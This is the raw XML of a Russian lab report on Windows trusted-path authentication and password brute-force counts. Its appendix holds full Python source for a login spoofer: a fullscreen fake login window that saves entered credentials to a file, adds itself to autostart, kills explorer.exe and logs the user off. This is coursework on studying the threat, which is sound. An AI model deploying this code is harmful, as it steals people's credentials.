        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>После запуска системы на экран выводится начальное окно рабочего стола аутентификации, где пользователю предлагается нажать комбинацию клавиш Ctrl+Alt+Del.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Нажатие этой комбинации активирует механизм доверенного пути, так как сообщение о нажатии передается только процессу WinLogon. Это гарантирует, что пользователь взаимодействует с настоящей системой аутентификации, а не с программой-имитатором.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>После этого система переключается на регистрационное окно, где пользователь вводит свои учетные данные.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="851"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Отличия от Unix-систем:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>В Unix-системах механизм доверенного пути реализован иначе. Например, в Linux для аутентификации используется модуль PAM (Pluggable Authentication Modules), который позволяет гибко настраивать процесс аутентификации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>В Unix-системах нет аналога комбинации Ctrl+Alt+Del. Вместо этого используются другие методы, такие как проверка подлинности через терминал или графический интерфейс (например, GDM или LightDM).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>В Unix-системах также используется концепция "рутового" пользователя (root), который имеет полный контроль</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>над системой, что требует дополнительных мер безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="851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5. Сколько вариантов необходимо перебрать, чтобы гарантированно</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="851"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>определить пароль пользователя, состоящий из 6 цифр? Как изменится это число, если дополнительно использовать латинские буквы?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="131" w:left="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Для пароля из 6 цифр:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>Каждая цифра может принимать одно из 10 значений (0-9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:left="851"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>Общее количество возможных комбинаций вычисляется по формуле:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=1000000</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
        <w:br/>
        <w:t>Таким образом, необходимо перебрать 1 миллион вариантов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="696" w:left="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Если дополнительно использовать латинские буквы:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:left="851"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>Латинский алфавит содержит 26 букв. Если учитывать регистр (строчные и заглавные), то количество возможных символов увеличивается до 62 (10 цифр + 26 строчных букв + 26 заглавных букв).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:ind w:firstLine="143" w:left="708"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>Общее количество возможных комбинаций для пароля из 6 символов:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>62</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>≈56 800 235 584</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Таким образом, необходимо перебрать около 56,8 миллиардов вариантов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="851"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Выводы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="696" w:left="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>В ходе выполнения лабораторной работы были получены практические навыки защиты информационных систем путем проверки подлинности пользователей. Основное внимание уделялось исследованию проблемы подмены механизма аутентификации в операционной системе Windows. В процессе работы были рассмотрены ключевые угрозы, связанные с аутентификацией, такие как угадывание пароля, компрометация файла паролей и подмена подсистемы аутентификации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="696" w:left="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Были изучены методы противодействия этим угрозам, включая использование сложных паролей, хэш-функций для хранения паролей, механизма доверенного пути (trusted path) и взаимной аутентификации. Особое внимание уделено механизму доверенного пути в Windows, который обеспечивает защиту от программ-имитаторов, перехватывающих учетные данные пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="696" w:left="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>На практике была разработана программа-имитатор, демонстрирующая возможность подмены интерфейса аутентификации. Программа скрывала интерфейс рабочего стола, выводила окно для ввода логина и пароля, сохраняла введенные данные и завершала сеанс пользователя. Это позволило наглядно убедиться в уязвимостях, связанных с подменой механизма аутентификации, и важности использования доверенного пути.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Ref194422467"/>
      <w:bookmarkStart w:id="14" w:name="_Ref194420535"/>
      <w:bookmarkStart w:id="15" w:name="_Toc35945238"/>
      <w:r>
        <w:rPr/>
        <w:t>П</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr/>
        <w:t>РИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>программы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>имитатора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import os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import ctypes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import tkinter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from tkinter import messagebox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import subprocess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import winreg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import sys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from PIL import ImageTk, Image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from screeninfo import get_monitors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import base64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from io import BytesIO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from codes import *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/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def encode_image(name): # Функция для декодирования изображений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base64_data = name # Записывает код изображения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binary_data = base64.b64decode(base64_data) # Декодирует изображение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image = Image.open(BytesIO(binary_data)) # Создаёт объект-изображенние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return image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/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def create_login_window():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def on_submit():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>username = username_entry.get()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>password = password_entry.get()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>messagebox.showerror("Ошибка", "Неверные данные")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>save_data(username, password)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>ctypes.windll.user32.ExitWindowsEx(0, 0) # Завершает сеанс пользователся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/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/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def on_focus_in(event):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>event.widget.config(bg='white', fg='#1c1c1c')  # Меняет цвет полоски ввода, когда её выделаешь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/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def on_focus_out(event):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>event.widget.config(bg='#1c1c1c', fg='#525252') # Меняет цвет полоски ввода, когда убираешь выделение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/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def on_press(event):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>event.widget.config(bg='#525252', fg='white')  # Цвета при нажатии на кнопки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/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def on_release(event):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>event.widget.config(bg='#525252', fg='black') # Цвета, когда отпускаешь кнопку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for monitor in get_monitors(): # При помощи библиотеки получаем разрешения монитора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 xml:space="preserve">width = monitor.width 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>height = monitor.height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/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root = tkinter.Tk() # Создание основного окна программы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root.title("Вход в систему") # Заголовок (Его не видно по сути)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root.geometry(f"{width}x{height}") # Разрешения окна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root.attributes('-fullscreen', True) # Делает окно во весь экран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root.attributes('-topmost', True) # Делает окно во весь экран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 xml:space="preserve">image = encode_image(image_64) # Декодирует изображение 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ratio = float(width / height) # Находим соотношение стором экрана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image = image.resize((width, int(width / ratio))) # Подгоняем изображение под экран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image = ImageTk.PhotoImage(image) # Создаём объект PhotoImage (чтобы потом разместить изображение)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/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 xml:space="preserve">logo = encode_image(logo_64) # Декодирует изображение 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logo = logo.resize((int(height * 0.2), int(height * 0.2))) # Меняем размер изображение в зависимости от размера экрана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logo = ImageTk.PhotoImage(logo) # Создаём объект PhotoImage (чтобы потом разместить изображение)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/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 xml:space="preserve">lan = encode_image(lan_64) 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 xml:space="preserve">lan = lan.resize((int(height * 0.04), int(height * 0.04))) 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 xml:space="preserve">lan = ImageTk.PhotoImage(lan) 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 xml:space="preserve">spec = encode_image(spec_64) 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 xml:space="preserve">spec = spec.resize((int(height * 0.04), int(height * 0.04))) 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 xml:space="preserve">spec = ImageTk.PhotoImage(spec) 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/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 xml:space="preserve">power = encode_image(power_64) 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 xml:space="preserve">power = power.resize((int(height * 0.04), int(height * 0.04))) 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 xml:space="preserve">power = ImageTk.PhotoImage(power) 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/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username_placeholder = "  Username" # Создаём текст который будет написан пока пользователь не начнёт вводить данные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password_placeholder = "  Password"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/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canvas = tkinter.Canvas(root, highlightthickness=0) # Создаём холст на котором будем фон и в котором будут все объекты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canvas.pack(side="top", fill="both", expand="yes") # Размещаем холст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/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canvas.create_image(width // 2, height // 2, anchor="center", image=image) # Размещаем все изображения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canvas.create_image(width // 2, height * 0.38, anchor="center", image=logo)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 xml:space="preserve">username_entry = tkinter.Entry( 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 xml:space="preserve">root, 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 xml:space="preserve">highlightthickness=1, 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>highlightcolor="#525252",            # Создаём поля ввода логина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>highlightbackground="#525252",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>relief='solid',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>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password_entry = tkinter.Entry(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 xml:space="preserve">root, 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 xml:space="preserve">highlightthickness=1, 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 xml:space="preserve">highlightcolor="#525252",            # Создаём поля ввода пароля  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>highlightbackground="#525252",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>relief='solid',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>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username_entry.insert(0, username_placeholder) # Размещаем начальный текст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password_entry.insert(0, password_placeholder)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/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username_entry.bind('&lt;FocusIn&gt;', lambda e: [on_focus_in(e), username_entry.delete(0, "end") if username_entry.get() == username_placeholder else None]) # Функции для удаления начального текста, когда пользователь выделает окно и чтобы окно меняло цвет при выделении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username_entry.bind('&lt;FocusOut&gt;', lambda e: [on_focus_out(e), username_entry.insert(0, username_placeholder) if not username_entry.get() else None])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password_entry.bind('&lt;FocusIn&gt;', lambda e: [on_focus_in(e), password_entry.delete(0, "end") if password_entry.get() == password_placeholder else None])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password_entry.bind('&lt;FocusOut&gt;', lambda e: [on_focus_out(e), password_entry.insert(0, password_placeholder) if not password_entry.get() else None])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/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canvas.create_window((width // 2, height * 0.55), anchor="center", window=username_entry, width=int(width * 0.2), height=int(height // 30)) # Размещяем поля ввода на холсте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canvas.create_window((width // 2, height * 0.59), anchor="center", window=password_entry, width=int(width * 0.2), height=int(height // 30))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canvas.create_text((width // 2, height * 0.5), anchor="center", text="Другой пользователь", fill="White", font="Segoe 14") # Размещаем текст на холсте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/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submit_button = tkinter.Button(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 xml:space="preserve">root, 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 xml:space="preserve">text="&gt;", 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>command=on_submit,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>bg="#525252",                   # Создаём кнопку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>bd=0,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>relief='flat'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>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submit_button.bind('&lt;ButtonPress&gt;', on_press)      # Бинды чтобы кнопка меняла цвет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submit_button.bind('&lt;ButtonRelease&gt;', on_release)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/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canvas.create_window((width // 1.7, height * 0.59), anchor="center", window=submit_button, width=int(height // 30), height=int(height // 30)) # Размещаем кнопку на холсте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/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root.after(100, lambda: password_entry.focus_set()) # Эти строчки - костыль, чтобы при запуске окна одно поле ввода изменило цвет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 xml:space="preserve">root.after(300, lambda: username_entry.focus_set()) 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/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root.bind('&lt;Return&gt;', lambda event: on_submit()) # Бинд кнопки ввода на enter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/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root.mainloop() # Запускает окно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/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/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def create_error_window():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root = tkinter.Tk()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root.title("Ошибка")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root.resizable(False, False)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/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def on_click():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>root.destroy()  # Затем гарантированно закрываем текущее окно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>create_login_window()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>root.quit()    # Дополнительно завершаем mainloop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# Отключаем закрытие окна через крестик или Alt+F4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root.protocol('WM_DELETE_WINDOW', lambda: None)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# Убираем стандартные кнопки свернуть/закрыть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root.attributes('-toolwindow', True)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# Иконка ошибки (красный круг с крестиком)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icon_label = tkinter.Label(root, text="ⓧ", fg="red", font=("Segoe UI", 24))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icon_label.grid(row=0, column=0, padx=15, pady=15, sticky="n")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# Основной текст ошибки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error_text = tkinter.Label(root, text="Произошла ошибка в приложении", font=("Segoe UI", 12))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error_text.grid(row=0, column=1, padx=5, pady=5, sticky="w")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# Дополнительная информация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 xml:space="preserve">detail_text = tkinter.Label(root, text="Код ошибки: 0x80070005\nДополнительная информация: Отказано в доступе", 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                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>font=("Segoe UI", 9), justify="left")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detail_text.grid(row=1, column=1, padx=5, pady=5, sticky="w")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# Кнопки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button_frame = tkinter.Frame(root)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button_frame.grid(row=2, column=0, columnspan=2, pady=10)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ok_button = tkinter.Button(button_frame, text="OK", width=10, command=on_click)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ok_button.pack(side="right", padx=5)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# Делаем окно поверх всех остальных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root.attributes('-topmost', True)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# Центрирование окна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root.update_idletasks()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width = root.winfo_width()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height = root.winfo_height()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x = (root.winfo_screenwidth() // 2) - (width // 2)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y = (root.winfo_screenheight() // 2) - (height // 2)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root.geometry(f'+{x}+{y}')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root.mainloop()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/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def add_to_startup():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/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exe_path = os.path.abspath(sys.argv[0]) # Путь к файлу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app_name = os.path.splitext(os.path.basename(exe_path))[0] # Имя программы (без .exe)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key = winreg.HKEY_CURRENT_USER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key_path = 'Software\Microsoft\Windows\CurrentVersion\Run'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# Открываем ключ автозагрузки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with winreg.OpenKey(key, key_path, 0, winreg.KEY_WRITE) as reg_key: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># Проверяем, есть ли уже запись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>try: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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>existing_value = winreg.QueryValueEx(reg_key, app_name)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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>return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>except: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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>winreg.SetValueEx(reg_key, app_name, 0, winreg.REG_SZ, exe_path)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/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def save_data(username, password):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/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desktop_path = os.path.join(os.path.expanduser("~"), "Desktop") # Получает путь до рабочего стола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file_path = os.path.join(desktop_path, "data.txt")  # Добавляет в путь название файла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/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with open(file_path, 'a+') as file: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>file.write(f"Username: {username}, Password: {password}\n") # Записывает в файл данные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/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def reg_variable(key, value_name):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try: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>value_data, value_type = winreg.QueryValueEx(key, value_name) # Пытается взять значение созданной переменной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>return value_data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except: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>winreg.SetValueEx(key, value_name, 0, winreg.REG_DWORD, 0) # Создаёт переменную (при первом запуске)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>value_data = 0 # Начальное значение переменной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>return value_data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/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def main():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key_path = "Console\Variables" # Путь до переменной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value_name = "main" # Название переменной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key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, key_path) # Открывает реестр по пути до переменной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/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add_to_startup()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/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if reg_variable(key, value_name) == 0: # Чередует запуск программы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>winreg.SetValueEx(key, value_name, 0, winreg.REG_DWORD, 1)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>subprocess.run(["taskkill", "/f", "/im", "explorer.exe"], shell=False)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>create_error_window()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else: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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>winreg.SetValueEx(key, value_name, 0, winreg.REG_DWORD, 0)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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>winreg.CloseKey(key) # Закрывает реест по пути до переменной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/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main()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    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="atLeast" w:line="20"/>
        <w:ind w:hanging="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sectPr>
      <w:headerReference w:type="even" r:id="rId10"/>
      <w:headerReference w:type="default" r:id="rId11"/>
      <w:headerReference w:type="first" r:id="rId12"/>
      <w:footerReference w:type="even" r:id="rId13"/>
      <w:footerReference w:type="default" r:id="rId14"/>
      <w:footerReference w:type="first" r:id="rId15"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:left="1134" w:right="850" w:gutter="0" w:header="708" w:top="1134" w:footer="708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MS Mincho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70948902"/>
    </w:sdtPr>
    <w:sdtContent>
      <w:p>
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:ind w:hanging="0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5</w:t>
        </w:r>
        <w:r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999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389" w:hanging="680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1287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1431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717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719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863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2007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2151" w:hanging="1584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isLgl/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="36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1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr/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1440"/>
        </w:tabs>
        <w:ind w:left="144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67"/>
        </w:tabs>
        <w:ind w:left="1067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russianLower"/>
      <w:lvlText w:val="%1)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uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 3" w:locked="0" w:uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 4" w:locked="0" w:uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 5" w:locked="0" w:uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 6" w:locked="0" w:uiPriority="5" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 7" w:locked="0" w:uiPriority="5" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 8" w:locked="0" w:uiPriority="5" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 9" w:locked="0" w:uiPriority="5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uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="toc 2" w:locked="0" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="toc 3" w:locked="0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1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semiHidden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styleId="Normal" w:default="1">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="0020070e"/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="0"/>
      <w:ind w:firstLine="851"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia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1"/>
    <w:qFormat/>
    <w:rsid w:val="00c53ada"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="left" w:pos="567" w:leader="none"/>
      </w:tabs>
      <w:ind w:firstLine="851" w:left="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="2"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00be19c9"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="left" w:pos="810" w:leader="none"/>
      </w:tabs>
      <w:ind w:firstLine="851" w:left="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00be19c9"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="left" w:pos="1134" w:leader="none"/>
        <w:tab w:val="left" w:pos="1701" w:leader="none"/>
      </w:tabs>
      <w:ind w:firstLine="851" w:left="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00384ecc"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:ind w:firstLine="851" w:left="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00384ecc"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:ind w:firstLine="851" w:left="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman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6"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00f52f00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7"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00f52f00"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8"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00f52f00"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9"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00f52f00"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Times New Roman" w:cs="Times New Roman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Заголовок Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="0093477c"/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1" w:customStyle="1">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="1"/>
